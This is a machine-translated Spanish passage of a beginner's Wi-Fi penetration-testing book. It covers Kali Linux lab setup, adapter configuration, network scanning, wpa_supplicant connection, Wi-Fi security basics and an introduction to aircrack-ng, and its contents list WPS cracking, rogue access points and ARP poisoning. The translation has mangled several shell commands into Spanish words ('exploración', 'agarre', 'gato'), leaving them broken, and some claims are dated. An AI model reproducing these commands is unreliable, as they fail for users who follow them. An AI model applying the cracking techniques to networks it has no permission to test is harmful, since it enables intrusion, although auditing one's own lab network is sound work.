???? ????? ???????? ?????????? ? ????????? ???? ?????????????
???? ????? ???????? ?????????? ? ????????? ???? ?????????????
[Link]
Machine Translated by Google
Créditos
Soporte financiero
varun bhatia
iii
Machine Translated by Google
Sobre el Autor
Hardeep Singh es un nombre entre millones que hackearon, fracasaron y siguieron practicando sin motivo
para ganar, sino para aprender. Al igual que cualquier otro novato, él también comenzó el camino BlackHat.
Más pronto se dio cuenta de que la raza humana ya se está comiendo el planeta, luchando entre sí, más
que cualquier otra especie y al menos debería usar sus habilidades para mejorar. Todo lo que tenía era
una actitud de aprendizaje eterna a la que aferrarse y un amor por la enseñanza.
Y una vez descubierto, siguió renunciando constantemente a su zona de confort y compartiendo todos
sus aprendizajes y pequeñas investigaciones con la comunidad. Es este mismo impulso de ayudar a las
personas y hacer algo bueno por la sociedad lo que lo inspiró a comenzar [Link].
Es su enfoque diligente, el gran apoyo de su familia y la fe de sus amigos lo que lo mantiene en marcha.
IV
Machine Translated by Google
Pasa la mayor parte de su tiempo dando seminarios sobre piratería ética y enseñando a estudiantes en
escuelas y universidades y le encanta hacerlo.
en
Machine Translated by Google
raí[Link]
En [Link], también puede leer una colección de artículos técnicos gratuitos, suscribirse a una variedad de boletines gratuitos,
y reciba artículos y libros electrónicos exclusivos sobre seguridad en profundidad y pentesting.
Área de miembros
[Link] está configurado exclusivamente para todas las consultas relacionadas con este libro y para las
posibilidades adicionales que no podemos realizar en el libro mismo. Los miembros obtienen acceso gratuito a todos los libros
electrónicos publicados, contenido de video exclusivo y seminarios web organizados sobre diversos temas.
Confirma tu compra en purchase@[Link] para obtener 3 meses de acceso VIP gratis a los miembros
área
nosotros
Machine Translated by Google
Gracias especiales
Estoy inmensamente agradecido con algunas personas que han sido una parte muy importante de mi vida y
que también me apoyaron y empujaron a perseguir mi sueño. Personas por las que este libro se ha convertido
en una realidad (virtual).
Gracias a mi mamá y mi papá por dejarme hacer lo que quería hacer, incluso en los momentos difíciles
sin nada que pedir. No podría estar más agradecido contigo.
Varun Bhatia, mi hermano, por mantener su brazo (financiero) detrás de mí. Sin él, Rootsh3ll habría estado
muerto y enterrado en la oscuridad de este magnánimo océano llamado Internet. Él es mi persona a la que
acudir cada vez que alguien dice "Un amigo necesitado es un amigo de verdad".
Nunca pidió nada a cambio, aparte de mi éxito, tengo mucha suerte de tenerlo.
como un amigo, un hermano, sin mencionar un inversionista que invierte en mi buena voluntad y éxito sin
ningún ROI. ¡Él es una verdadera joya!
Prienka Bakshi, una de las pocas personas más cercanas a las que admiro de corazón siempre. Gracias
de corazón a ella por estar de mi lado, por empujarme cada vez que bajaba y detenerme.
de perder el tiempo, ayudándome a escribir este libro, incluso cuando ella vive lejos, se aseguró de dejarme
una marca y ayudarme a dejar una marca (pequeña).
Este libro también está dedicado a todas las personas del mundo que aspiran a aprender la tecnología central,
cómo romperla y asegurarla.
¡Gracias a todos!
viii
Machine Translated by Google
Descargo de responsabilidad
El contenido de este libro tiene únicamente fines educativos. Está diseñado para ayudar a los usuarios
aprender sobre las vulnerabilidades de la red Wi-Fi para probar su propio sistema contra amenazas
a la seguridad de la información y proteger su infraestructura de TI de ataques similares. [Link]
y el autor de este libro no se hacen responsables de las acciones que resulten del uso inapropiado del
material de aprendizaje contenido en este libro.
viii
Machine Translated by Google
Machine Translated by Google
Tabla de contenido
0
CONFIGURACIÓN DEL LABORATORIO 1
REQUISITOS DE HARDWARE 1
REQUISITOS DE SOFTWARE 2
INSTALACIÓN KALI LINUX : 3
INSTALAR KALI LINUX BAJO VMWARE 3
INSTALANDO KALI LINUX EN PC 11
1
ENTENDIENDO LOS FUNDAMENTOS DE LAS REDES WI-FI 26
yo
Machine Translated by Google
2
CRACKEAR LA SEGURIDAD DE LA RED INALÁMBRICA 32
INTRODUCCIÓN A WIRESHARK 37
HISTORIA 38
deja de olfatear 42
FILTROS Y ANÁLISIS DE PAQUETES 42
Mostrar filtros 42
Filtros de captura 43
CRACKEO DE WPS 59
¿QUÉ ES WPS? 59
¿QUÉ ES REVER? 59
UNA VERDAD FEA SOBRE WPS [ PARA PENTESTERS] 62
CONTROLADORES INALÁMBRICOS COMPATIBLES 62
CONTRAMEDIDAS 63
iii
Machine Translated by Google
3
CRACKEO AUTOMATIZADO DE WI-FI 64
4
ACELERANDO EL CRACKEO DE WPA/2 74
INTRODUCCIÓN 74
¿QUÉ ES PMK? 75
¿QUÉ ES COWATTY? 76
¿QUÉ ES PIRITA? 76
IV
Machine Translated by Google
5
POST-EXPLOTACIÓN DE LA RED 98
INTRODUCCIÓN 98
¿QUÉ ES UNA SUBRED? 99
HERRAMIENTAS UTILIZADAS 100
INSTALACIÓN Y CONFIGURACIÓN 100
ESCANEANDO LA SUBRED 101
ESCANEAR LA SUBRED UTILIZANDO NMAP 101
¿CÓMO FUNCIONA EL ENVENENAMIENTO ARP ? 104
PREVENIR ATAQUES DE OLFATO 107
INTERRUPCIÓN DE LA RED WI-FI 108
DISECCIÓN DE UN CLIENTE INALÁMBRICO 109
6
PUNTO DE ACCESO ROGUE: INTRODUCCIÓN 110
en
Machine Translated by Google
7
ROGUE AP: UNA INMERSIÓN MÁS PROFUNDA 127
nosotros
Machine Translated by Google
8
PORTALES CAUTIVOS 144
EN TEORIA 144
INTRODUCCIÓN 145
ESTRATEGIA BÁSICA DETRÁS DE LA DETECCIÓN DE PORTAL CAUTIVO 145
DIFERENCIAS ENTRE DISPOSITIVOS CLIENTE 146
9
AP FALSO ÚLTIMO 155
viii
Machine Translated by Google
10
HACKEO DE WI-FI [APÉNDICE] 165
viii
Machine Translated by Google
Prefacio
Las redes inalámbricas se han vuelto omnipresentes en el mundo actual. Millones de personas lo utilizan
en todo el mundo todos los días en sus hogares, oficinas y puntos de acceso públicos para iniciar sesión en
Internet y realizar trabajos personales y profesionales. Aunque la tecnología inalámbrica hace la vida increíblemente
fácil y nos brinda una gran movilidad, conlleva riesgos. En los últimos tiempos, las redes inalámbricas inseguras
se han utilizado para infiltrarse en empresas, bancos y organizaciones gubernamentales.
La frecuencia de estos ataques solo se intensifica, ya que los administradores de red aún no tienen ni idea cuando
se trata de proteger las redes inalámbricas de una manera sólida e infalible.
Kali Linux Wireless Pen-testing and Security for Beginners tiene como objetivo ayudar al lector a comprender
la profundidad de las inseguridades asociadas con las redes inalámbricas y cómo realizar pruebas de penetración
para encontrarlas, conectarlas y asegurarlas/parcharlas aún más. Esta es una lectura esencial para quienes
deseen realizar auditorías de seguridad en redes inalámbricas y siempre quisieron una práctica paso a paso.
Como cada ataque inalámbrico explicado en este libro es seguido inmediatamente por una demostración práctica,
el aprendizaje es muy completo.
Hemos elegido Kali Linux como plataforma para probar todos los ataques inalámbricos de este libro. Kali Linux,
como la mayoría de ustedes ya sabrá, es la distribución de prueba de penetración más popular del mundo.
Contiene cientos de herramientas de seguridad y piratería, algunas de las cuales usaremos en este curso de este
libro.
Piratería
La piratería de material protegido por derechos de autor en Internet es un problema constante en todos
los medios. En rootsh3ll, nos tomamos muy en serio la protección de nuestros derechos de autor y licencias.
Si encuentra copias ilegales de nuestros trabajos, en cualquier forma, en Internet, indíquenos la dirección de
la ubicación o el nombre del sitio web de inmediato para que podamos buscar una solución.
Póngase en contacto con nosotros en copyright@[Link] con un enlace al material sospechoso
de piratería.
ix
Machine Translated by Google
Agradecemos su ayuda para proteger a nuestros autores y nuestra capacidad para brindarle valiosos
contenido.
Convenciones
En este libro, encontrará varios estilos de texto que distinguen entre diferentes tipos de
información. Aquí hay algunos ejemplos de estos estilos y una explicación de su significado.
Las palabras de código en el texto, los nombres de las tablas de la base de datos, los nombres de las carpetas, los nombres de los archivos, las extensiones de los archivos, las
rutas de acceso, las direcciones URL ficticias, la entrada del usuario y los identificadores de Twitter se muestran de la siguiente manera: "Abra la terminal y escriba iwconfig".
el cuadro gris con contorno negro muestra la salida del comando anterior y/o
el contenido de un archivo
Preguntas
Puede contactarnos en query@[Link] si tiene algún problema con algún aspecto del libro, publique su
consulta directamente en el foro de soporte [Link] o envíe un correo electrónico al autor a
harry@[Link] y haremos todo lo posible para solucionarlo.
X
Machine Translated by Google
0
Configuración del laboratorio
Requisitos de hardware
• Una computadora portátil con una tarjeta de interfaz de red (NIC) que funcione
• Usaré una computadora portátil para instalar y ejecutar Kali Linux en VMWare como la máquina del atacante y
el host (Windows) como la máquina de la víctima. Kali Linux debe tener al menos 1 GB de RAM de RAM
asignada. Esto se debe a que ejecutaremos un
• gran cantidad de software de uso intensivo de memoria en toda la serie.
• 1 adaptador inalámbrico Alfa: para obtener el mejor resultado, necesitamos una tarjeta Wi-Fi USB que
admita la inyección de paquetes y la detección de paquetes. Usaremos Alfa AWUS036NH 2000mW en
esta serie Que puede comprar en eBay / Amazon, que se vende al por menor por menos de $ 30 en el
momento de escribir este artículo.
• 1 TP-LINK WN-722N Adaptador USB v1 (no versión 2) [Opcional]
• Recepción de señal más débil, menor potencia de transmisión (TX), más barata y una de las tarjetas Wi-Fi
económicas más adecuadas para Kali Linux. Se utiliza para una tarea muy específica que no se puede
realizar con la tarjeta Alfa AWUS036NH. Ver Capítulo 7 parte 2
• 1 punto de acceso: un punto de acceso compatible con los estándares de encriptación WEP, WPA/WPA2 y
WPS. Un enrutador inalámbrico N TP-Link MR3420 3G se utiliza para la ilustración en este
libro.
• Una conexión a Internet estable y rápida para una descarga óptima de software y otros
experimentos
1
Machine Translated by Google
Requisitos de Software
• Kali Linux: el último sistema operativo de Pentesting
• Kali Linux 2017.1 ISO se puede descargar desde la página de descarga del sitio web oficial ubicada en https://
[Link]/ downloads/. Es un sistema operativo de código abierto que viene con una variedad de
herramientas preinstaladas para pruebas de penetración.
• VMWare Workstation se utiliza para ejecutar Kali Linux y conectar dispositivos inalámbricos.
Para que no sea diferente a un Kali Linux instalado en PC con una tarjeta Alfa conectada. Puede descargar
la última versión de VMWare desde su sitio web oficial.
• Windows 7/8/10 como máquina(s) anfitriona(s): Usaremos Windows como la víctima que se conectará al
punto de acceso original de la serie. La tarjeta de red de la máquina host se dedicará solo al host (Windows)
y la tarjeta Alfa se dedicará a Kali Linux (en VMWare) solo con fines de ataque.
Nota: Aunque estamos usando una máquina con Windows para conectarnos a AP, podemos hacerlo con cualquier
dispositivo electrónico capaz de realizar tareas inalámbricas (relacionadas con Wi-Fi), como dispositivos móviles, tabletas,
impresoras inalámbricas, etc.
2
Machine Translated by Google
Como principiante, es seguro instalar Kali Linux en un entorno virtual. Te da libertad para experimentar,
explorar el sistema operativo sin tener que perder los datos en ningún caso.
Una máquina virtual, o VM, es una aplicación que se ejecuta en Windows que crea un entorno
que simula una computadora completamente separada.
Todo lo que sucede en la VM permanece dentro de la VM. Se comporta exactamente como si fuera
una máquina física completamente separada.
Eso implica que cualquier descarga, cambio, actualización, instalación... cualquier cosa... que se cree o
guarde dentro de la máquina virtual solo es accesible a través de la VM de alguna manera.
Y si elimina la VM, es como deshacerse de una PC. Se borra todo el contenido del disco duro virtual.
Suponiendo que haya descargado la versión adecuada de Kali (32/64 bits), comencemos la instalación
3
Machine Translated by Google
Paso 1:
“
Inicie VMWare Workstation, vaya al menú de archivo y haga clic en "Nueva máquina virtual
Paso 2:
Haga clic en siguiente. con la opción seleccionada "Típica (recomendada) "
4
Machine Translated by Google
Paso 3:
Paso 4:
Asigne el tamaño del disco a Kali y haga clic en Siguiente
5
Machine Translated by Google
20 GB serán óptimos para la máquina virtual, ya que usaremos principalmente herramientas preinstaladas
durante esta serie.
Paso 5:
haga clic en Finalizar y luego en Encienda esta máquina virtual.
Paso 6:
ahora la máquina virtual se iniciará. Seleccione/resalte la opción Instalar y presione [ENTRAR]
6
Machine Translated by Google
Paso 7:
Paso 8:
Paso 9:
Seleccione el disco, presione [ENTRAR] , luego seleccione Todos los archivos en una partición y presione [ENTRAR].
7
Machine Translated by Google
Paso 10:
Paso 11:
Paso 12:
Paso 13:
El programa de instalación le pedirá que seleccione un espejo de red para descargar los paquetes más recientes. Seleccione No y
luego haga clic en cancelar.
8
Machine Translated by Google
Paso 14:
Instale GRUB (GRand Unified Bootloader) al registro maestro de arranque. Para elegir entre las opciones para iniciar Kali
Paso 15:
Paso 16:
Ahora inicie la máquina virtual "Kali Linux" y presione [ENTER] para continuar con el arranque.
9
Machine Translated by Google
Paso 17:
Presione [ENTER] en otro e ingrese las credenciales
Nombre de usuario: raíz
Ahora, hemos instalado con éxito Kali Linux en VMWare Workstation e iniciado sesión en el Escritorio.
10
Machine Translated by Google
Kali se puede ejecutar en modo en vivo, es decir, directamente desde USB sin ninguna instalación, o instalarlo completamente
en su disco duro.
La mejor manera de ejecutar o instalar Kali Linux es ejecutarlo desde un USB. Este método tiene varias ventajas:
• Ultraportátil : USB siempre ha sido conocido por su portabilidad. La instalación de Kali en un USB lo hace
ultraportátil y nos permite ejecutarlo dondequiera que vayamos. solo necesita conectar y usar la memoria USB
y estamos listos con nuestro Kali.
• Instalación más rápida : las versiones anteriores de USB (2.0) admiten una velocidad de lectura de un máx. de 7-10
MBPS y el reciente USB 3.0 son incluso más rápidos que eso. Lo que hace que la instalación de Kali Linux sea
increíblemente rápida.
• Personalizable : Linux siempre es de código abierto, al igual que Kali. Puede personalizar y
compilar Kali Linux e instalar su propia versión en la memoria USB.
• Persistente : el arranque en Live Disc desde USB borra toda la actividad o las tareas realizadas después de reiniciar
el sistema. Live Kali instalado en USB se puede hacer persistente con un poco de esfuerzo.
Como haremos muchos cambios en el sistema a lo largo del camino, es ideal tener una instalación completa disponible.
Sin embargo, para un principiante, recomiendo realizar todas las pruebas en una máquina virtual.
• Memoria USB (>4 GB) - Podemos iniciar el sistema Live o instalar a través de USB. 4+ conciertos de
el almacenamiento sería suficiente.
• Kali Linux ISO : el archivo ISO contiene el sistema operativo y la información de arranque necesaria, que se
escribirá en la memoria USB y nos permitirá acceder a GRUB.
• Computadora portátil/de escritorio (~4 GB de RAM) : realizaremos tareas de memoria extensa. por lo tanto, un
requisito mínimo es un sistema con 4 GB de RAM y un procesador de doble núcleo. Para garantizar que Kali Linux
funcione bien a lo largo de la serie.
• Una instalación de Windows : necesitaremos Windows para particionar el disco para Kali Linux. Será fácil y seguro
para los principiantes.
• Rufus Bootable USB Creator - Se explica por sí mismo. Descargar desde [Link]
11
Machine Translated by Google
Los discos de registro de arranque maestro (MBR) utilizan la tabla de particiones BIOS estándar (heredada).
Los discos de la tabla de particiones GUID (GPT) utilizan la interfaz de firmware extensible unificada (UEFI). Una ventaja
de los discos GPT es que puede tener más de cuatro particiones primarias en cada disco.
Todas las demás computadoras portátiles ahora vienen con el modo UEFI, a diferencia de las máquinas más antiguas
que se ejecutan en BIOS heredado. Con la tabla de particiones GPT viene UEFI y con msdos/Master Boot Record (MBR)
tabla de particiones viene BIOS. Tanto el disco duro de destino como el medio de instalación (USB) deben tener la misma
tabla de particiones. Ya sea GPT-GPT o MBR-MBR, de lo contrario es una incompatibilidad.
Es sencillo comprobar si tienes un disco tipo GPT o msdos.
Si un disco es GPT, tendrá un asterisco (*) debajo de la columna "GPT". Si es un disco MBR, estará en blanco debajo de la
columna GPT.
La mía es una tabla de partición de estilo MBR, por lo que la columna GPT está en blanco. De lo contrario, se vería así:
12
Machine Translated by Google
Ahora que sabe qué tipo de partición tiene su máquina, el siguiente paso es crear un USB de arranque con Rufus.
2. Seleccione el esquema de
partición apropiado.
6. ¡Quema!
Los sistemas Linux utilizan un espacio dedicado, espacio/partición de intercambio, como método de gestión de la
memoria. Es simplemente [Link] para sistemas Linux.
El espacio de intercambio en Linux se usa cuando la cantidad de memoria física (RAM) está llena. Si el sistema
necesita más recursos de memoria y la RAM está llena, las páginas inactivas en la memoria se mueven al espacio de
intercambio. El espacio de intercambio puede ser una partición de intercambio dedicada (recomendado), un archivo de
intercambio o una combinación de particiones de intercambio y archivos de intercambio.
13
Machine Translated by Google
2. Intercambiar partición
Paso 1:
Paso 2:
2. Reducir (C: en este caso) para reducir algo de espacio de la unidad seleccionada.
La partición seleccionada debe ser primaria. Se necesita una partición de tipo principal para iniciar Kali. Escribiremos el cargador de
arranque de Kali (GRUB) en el registro de arranque maestro durante la instalación. Por lo tanto, asegúrese de que la partición que
14
Machine Translated by Google
Solo tenía 20484 MB de espacio retráctil. Pero se recomienda que use al menos 30 GB
para evitar problemas de poco espacio en disco.
Dividir. ¡Cheque!
El arranque desde medios USB/DVD varía según el proveedor. Intente presionar <ESC>, <F8>, <F10>, <F12> o la tecla Supr para arrancar
desde su USB. De lo contrario, dé prioridad al primer dispositivo de arranque a USB en BIOS
15
Machine Translated by Google
Después de eliminar Kali Linux, no podrá iniciar Windows ni ningún sistema operativo instalado después de reiniciar. ¡Entonces,
asegúrese de haber creado un USB de arranque de Kali Linux para la instalación o el rescate!
P. ¿Por qué eliminar Kali Linux? Es la mejor distribución de pruebas de penetración que existe.
Bueno, como Kali Linux es una distribución de código abierto y no tiene absolutamente NINGUNA GARANTÍA, y además, usaremos la
cuenta raíz con mucha frecuencia, por lo que hay posibilidades de que uno pueda corromper el cargador de arranque mientras juega
Existe un Kali Linux inutilizable previamente instalado en su PC y decide eliminarlo e instalar otra Distro de Pentesting (cualquiera).
Utilizando el espacio mientras evitamos MBR, aprenderemos el proceso para eliminar Kali Linux de manera ordenada.
Kali Linux instala su información de arranque en el registro de arranque maestro mientras reemplaza la información de arranque de
cualquier sistema operativo anterior (generalmente Windows). luego se agrega al menú de opciones al inicio para elegir desde qué
sistema operativo iniciar.
Entonces, un cargador GRUB dañado significa una lista inutilizable de sistemas operativos.
dieciséis
Machine Translated by Google
Haga clic derecho en la partición principal y luego haga clic en Eliminar volumen.
Aparecerá una ventana. haga clic en eliminar. Esto eliminará tanto la partición principal como la de intercambio
asociada.
17
Machine Translated by Google
Al ser una tarjeta de propósito específico, la tarjeta Alfa no necesita ninguna configuración en Kali Linux. Es un dispositivo Plug-
and-play. Sin embargo, si intenta usar la tarjeta Alfa en Windows <10, deberá instalar los controladores desde el CD (en la caja).
Paso 1:
VMWare > VM > Dispositivos extraíbles > Tarjeta Wi-Fi > Conectar (Desconectar del host)
Aquí, Windows es la máquina host para cualquier sistema operativo VMWare. Para conectar y acceder a la tarjeta Alfa dentro
Paso 2:
Haga clic con el botón derecho > "Abrir terminal" y escriba iwconfig.
18
Machine Translated by Google
Cuando ejecuta ifconfig, muestra las interfaces que están activas. Wlan0 no está activo en este momento.
Póngalo con el comando:
La dirección MAC [Link] debe coincidir con la dirección MAC impresa debajo de su tarjeta Alfa. Esta
es una verificación rápida para asegurarse de que ha habilitado la interfaz correcta. En caso de que esté utilizando
la tarjeta alfa en Kali Linux instalada directamente en la PC.
19
Machine Translated by Google
paquete que le brinda todos los comandos útiles como ls, ps, mv, iw.
¿Qué sucede si tiene un dispositivo estándar sin acceso a Internet? ¿Cómo hiciste el pentest?
¡Con utilidades básicas!
Paso 0:
Paso 1:
20
Machine Translated by Google
ESSID:"ravi@wifi"
Tasas de bits: 1 Mb/s; 2 Mb/s; 5,5 Mb/s; 11 Mb/s; 6 MB/s
9 MB/s; 12 Mb/s; 18 Mb/s
Tasas de bits: 24 Mb/s; 36 Mb/s; 48 Mb/s; 54 MB/s
Modo: Maestro
Extra:tsf=0000000436eb8c36
Extra: Última baliza: hace 36 ms
ES: Desconocido: 0009726176694077696669
ES: Desconocido: 010882848B960C121824
ES: Desconocido: 030109
ES: Desconocido: 2A0100
IE: Desconocido: 32043048606C
IE: Desconocido: 2D1A2C181EFF000000000000000000000000000000000000000000000
IE: Desconocido: 3D16090000000000000000000000000000000000000000000
ES: WPA Versión 1
Cifrado de grupo: TKIP
Cifrados por pares (2): TKIP CCMP
Conjuntos de autenticación (1): PSK
IE: IEEE 802.11i/WPA2 Versión 1 Cifrado de
grupo: TKIP Cifrados por pares (2): TKIP
CCMP Conjuntos de autenticación (1): PSK
La salida está muy desordenada. entonces, necesitamos filtrar la salida usando la utilidad iwlist .
Producción:
ESID: "rootsh3ll"
ESSID:"ravi@wifi"
Desglose de comandos:
exploración iwlist wlan0: Escanee la interfaz inalámbrica wlan0, usando la utilidad iwlist
| agarre ESSID: Canalice la salida a grep usando |. Líneas de filtro que contienen la cadena ESSID
ESSID: identificador de conjunto de servicios básicos extendidos , también llamado nombre de punto de acceso.
Tarjeta Alfa escaneada con éxito para todos los puntos de acceso disponibles en las cercanías
1. rootsh3ll:
2. ravi@wifi
21
Machine Translated by Google
gato [Link]
red={
ssid="rootsh3ll"
#psk="iamrootsh3ll"
psk=1f4b02fe4c82f4e0262e6097e7bad1f19283b6687f084f73331db86c62498b40
}
Producción:
Wpa_supplicant inicializado con éxito
wlan0: SME: intentando autenticarse con [Link] (SSID='rootsh3ll' freq=2437 MHz)
wlan0: intentando asociarse con [Link] (SSID='rootsh3ll' freq=2437 MHz)
wlan0: Asociado con [Link]
wlan0: WPA: negociación de clave completada con [Link] [PTK=CCMP GTK=CCMP]
wlan0: CTRL-EVENT-CONNECTED - Conexión a [Link] completada [id=0 id_str=]
Desglose de comandos:
wpa_supplicant: Utilidad de stock para asociar las tarjetas inalámbricas con puntos de acceso de
Terminal
-D nl80211: Controladores inalámbricos para realizar el proceso de autenticación/asociación.
-i wlan0: Interfaz inalámbrica a utilizar. El tuyo puede ser diferente.
-c [Link]: Archivo de configuración creado con la utilidad wpa_passphrase.
Esa es toda la configuración que necesita conservar para ahorrar tiempo. Entremos ahora en la mecánica del AP falso
wpa_supplicant solo puede conectarse a redes de tipo WPA/2. Para conectar WEP puede usar iwconfig.
22
Machine Translated by Google
Ejemplo:
iwconfig wlan0 essid rootsh3ll canal 11
ifconfig wlan0
23
Machine Translated by Google
Consejo profesional
Escanee los AP en busca de ESSID, BSSID, número de canal, intensidad de la señal, etc.
Filtre la salida de iwlist por ESSID y número de canal, por ejemplo
exploración iwlist wlan0 | grep -i “esid\| canal:"
Desglose de comandos:
exploración iwlist wlan0: Escanear interfaz inalámbrica wlan0
| grep-yo Canalice la salida a grep usando '|' mientras ignora el caso del carácter (-i)
Evita la salida de líneas innecesarias. Cada filtro debe escribirse entre comillas.
El operador de tubería se utiliza como operador OR. Lo que significa que grep mostrará una línea
que contiene cadenas essid O canal: (sin distinción entre mayúsculas y minúsculas).
Se utiliza una barra invertida \ para evitar que el operador OR actúe como canalización. Esto se
llama carácter de escape. Se utiliza para escapar de caracteres como espacios, comillas y otros
caracteres significativos para la sintaxis de shell.
Observe el resultado y experimente con distintas palabras clave, con \| para optimizar la salida
deseada.
--color (Opcional) para resaltar cadenas en rojo
24
Machine Translated by Google
Resumen
Este capítulo proporciona instrucciones detalladas sobre cómo instalar Kali Linux en la estación de trabajo VMWare.
Además, en el proceso, ha aprendido los pasos básicos para:
• Escaneo del aire y detección de los puntos de acceso disponibles, usando Terminal
Es importante entender todos y cada uno de los comandos utilizados en el tutorial, si no ganó confianza en la
instalación del sistema y la configuración de la tarjeta Alfa, le recomiendo que repita este capítulo un par de veces.
25
Machine Translated by Google
1
Comprender los conceptos
básicos de las redes Wi-Fi
Por lo tanto, me gustaría que lea este capítulo detenidamente, ya que le ayudará a construir
una base sólida en redes inalámbricas, aumentará sus capacidades y será muy útil en su vida,
especialmente en su carrera relacionada con la seguridad.
Empecemos,
26
Machine Translated by Google
¿Qué es wifi?
Wi-Fi es el nombre de la popular tecnología de redes inalámbricas que utiliza ondas de radio para propagarse a
través del aire para proporcionar Internet de alta velocidad y conexiones de red que reducen el uso de cables de
manera efectiva. ver Webopedia
La tecnología inalámbrica no solo ahorra el elemento utilizado para fabricar los cables, sino que también
proporciona un costo de instalación mucho menor de los dispositivos, ya que no hay un cable para la instalación
por dispositivo, sino solo cierta información para registrar, lo que quizás sea cuestión de unos minutos.
Como vemos hoy en día, los dispositivos inalámbricos se han convertido en una parte esencial para la vida de uno.
Con el tiempo, se expandirá a tanta gente como sea posible.
Por lo tanto, más dispositivos inalámbricos, más vulnerabilidades y más necesidad de expertos en seguridad Wi-Fi.
Los 3 protocolos tienen sus propios métodos de encriptación mejores que los anteriores.
• WEP: utiliza el algoritmo RC4 para cifrar paquetes de datos
• WPA: utiliza encriptación TKIP, basada en WEP
• WPA2: utiliza AES, más seguro e ininterrumpido en este punto
27
Machine Translated by Google
¿Cuál es la necesidad?
En 1997, Wi-Fi Alliance lanzó el primer estándar de seguridad para las redes inalámbricas, es decir
WEP, pero a principios de 2001, WEP se rompió dos veces, lo que llevó a la recuperación/piratería de la contraseña de la
red inalámbrica. Luego, nuevamente en 2002, un investigador de seguridad descubrió una falla de seguridad en WEP. WEP
se rompió sin posibilidad de reparación en este punto.
Este fue el momento en que el comité IEEE dijo que necesitaban un parche rápido para WEP.
En 2003 se lanzó WPA, una solución intermedia para WEP.
Se suponía que WPA se ejecutaría en el mismo hardware compatible con WEP. Todo lo que uno necesita hacer es una
actualización de firmware.
Algunas cosas clave a tener en cuenta:
• WPA utiliza encriptación TKIP, que envuelve los paquetes WEP para limpiar algunos
vulnerabilidades descubiertas anteriormente y proporcionan una mejor seguridad. Entonces, básicamente
estaba basado en WEP.
• Los cambios de hardware no eran obligatorios para WPA, ya que se suponía que corregirían la vulnerabilidad
del enrutador que ya se había enviado.
• Al mismo tiempo, la alianza Wi-Fi comenzó a trabajar en el protocolo muy seguro de Wi-Fi.
Fi, que se denominó WPA2.
Un año después, en septiembre de 2004, Wi-Fi Alliance lanzó la versión más segura de la seguridad inalámbrica, es
decir, WPA2.
• WPA2 usa AES para el cifrado de paquetes, es quizás el método de cifrado más seguro disponible e ininterrumpido
en este punto.
la certificación es obligatoria para que todos los dispositivos nuevos lleven la marca Wi-Fi.
28
Machine Translated by Google
IP pública
Una computadora en Internet se identifica mediante una dirección única de 32 bits, IP pública. Las direcciones
IP se registran públicamente con Network Information Center (NIC) para evitar conflictos de IP.
El público no necesita acceder a la computadora en la red de área local (LAN) protegida por enrutador, por
esta razón, la NIC ha reservado ciertas direcciones que nunca se pueden registrar públicamente. Esas
direcciones se llaman
ip privada
Dirección IP de una computadora dentro de una W/LAN. ejemplo, [Link]
Ciertas direcciones reservadas por la NIC se dividen en 3 clases de IP privadas:
universidades
C [Link] - [Link] [Link] 65.536 ¡Perfecto para
enrutadores domésticos!
Las direcciones IP privadas se asignan a los dispositivos cliente conectados al enrutador. Un cliente
El dispositivo puede ser su computadora portátil, móvil, tableta, cualquier cosa que sea inalámbrica.
29
Machine Translated by Google
Usos de IP pública
Además de simplemente ubicar el dispositivo a través de Internet, la IP pública juega un papel importante en
Búsqueda inversa de IP
A menudo se denomina verificación de dominio de IP inversa. Lo que sucede es que ingresa un nombre de
dominio, digamos [Link] y la herramienta de IP inversa verificará la dirección IP de [Link]
[[Link]] y luego verificará otros sitios que se sabe que están alojados en la misma dirección web.
Búsqueda de DNS
Sitios web como [Link] nos permite comprobar el servidor de nombres de un sitio web y otros
cosas interesantes con eso. ¡Este es, con mucho, uno de los mejores y más útiles sitios web para los piratas
informáticos!
Simplemente busque en Google "encontrar ubicación IP" o vaya a este sitio web: [Link].
Mostrará todos los detalles relacionados con su IP pública. También puede ver su ubicación en Google Maps. ¡Seguir
mirando! encontrarás muchas cosas interesantes.
¿Cosas con IP privadas? Los estaremos interpretando a lo largo de la serie. ¡Manténganse al tanto!
30
Machine Translated by Google
Futuro de Wi-Fi
A medida que el mundo se está moviendo de los dispositivos con cable a los inalámbricos (mejores) y también los
dispositivos inalámbricos se están volviendo exponencialmente más rápidos, mejores y más baratos, el futuro de Wi-Fi es
Como habrás visto, el infame MacBook de Apple. Tiene un solo puerto (USB-C) para cargar, ya que la carga
inalámbrica no está disponible en este momento. Cualquier tipo de transferencia de datos hacia/a través de la
MacBook debe ser inalámbrica. Puede ser:
• Escuchando música
• Almacenamiento de datos en SSD
La parte crucial es que el almacenamiento de datos en SSD de forma inalámbrica puede ser más lento que el
almacenamiento con cables (USB 3.0). Pero la buena noticia es que MacBook y muchos enrutadores nuevos ahora
son compatibles con redes de tipo 802.11ac . Que es 3 veces más rápido que la red tipo n. Por lo tanto, el
almacenamiento de datos de forma inalámbrica será increíblemente más fácil no solo en MacBook sino en todos los
dispositivos que admitan redes de tipo ac.
31
Machine Translated by Google
2
Descifrando la red inalámbrica
Seguridad de la red
¿Qué es Aircrack-ng?
Aircrack-ng es un conjunto de herramientas utilizado por principiantes y expertos para rastrear, descifrar y
crear puntos de acceso no autorizados.
La definición convencional es así:
Aircrack-ng es un programa de descifrado de claves 802.11 WEP y WPA/ 2-PSK que puede recuperar claves
una vez que se han capturado suficientes paquetes de datos.
• Mon-ng
• Airodump-ng
• Airbase-ng
• Aireplaying
• Airolib-ng
• Aircrack-ng
32
Machine Translated by Google
Hablaremos sobre las herramientas anteriores, ya que son las herramientas más utilizadas y se utilizan en casi todos los
pentest inalámbricos.
Aircrack-ng viene para Linux, Mac y Windows y viene preinstalado en Kali Linux. Podemos instalar manualmente Aircrack-ng en
Descargar Aircrack-ng
La última versión de Aircrack-ng se puede descargar desde su sitio oficial, [Link]
Para Windows, Aircrack-ng proporciona binarios precompilados. Puedes descargar el zip aquí
Instalar Aircrack-ng
En Windows, Aircrack-ng viene en un paquete binario precompilado de descarga y ejecución.
Instalación en Windows:
Descomprima aircrack-ng*.zip ([Link], como última versión)
Tomaremos un ejemplo de
Instalación en Linux
El parámetro sqlite=true es para agregar compatibilidad con Airolib-ng en Aircrack-ng. Veremos el uso de Airolib-ng para acelerar
33
Machine Translated by Google
2. Escriba ifconfig y verifique su interfaz inalámbrica, wlan0 en mi caso y usaremos wlan0 en el tutorial
ifconfig wlan0
wlan0 Enlace encap:Ethernet HWaddr [Link] inet
addr:[Link] Bcast:[Link] Máscara:[Link]
dirección inet6: fe80::2c0:caff:fe5a:34b6/64 Alcance: Enlace
